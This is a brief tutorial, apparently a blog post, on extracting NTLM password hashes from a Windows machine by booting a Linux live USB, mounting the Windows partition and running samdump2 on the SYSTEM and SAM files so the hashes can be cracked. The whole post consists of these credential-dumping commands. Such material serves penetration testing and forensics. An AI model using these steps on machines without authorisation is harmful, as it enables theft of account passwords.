Extract NTLM Hashes via Linux Live Boot
Using a live boot of Linux, we can extract the NTLM hashes of the windows accounts on a computer and attempt to crack to find out the passwords.
Prerequisites
- Physical access to a Windows Machine without BitLocker
- Bootable Linux USB (ideally Kali)
Mount Drive
Create a new directory where the drive will be mounted:
1
mkdir FOLDER_NAME
List Block Devices:
1
lsblk
Mount the primary windows partition (it should be the largest one there):
1
mount /dev/PARTITION_NAME FOLDER_NAME
FOLDER_NAME
is the folder created above
Dump Hashes
Navigate to Windows/System32/config
in the mounted drive and run:
1
samdump2 SYSTEM SAM
- Hashes will be in PWDump format
<username>:<uid>:<LM-hash>:<NTLM-hash>:<comment>:<homedir>:
This post is licensed under CC BY 4.0 by the author.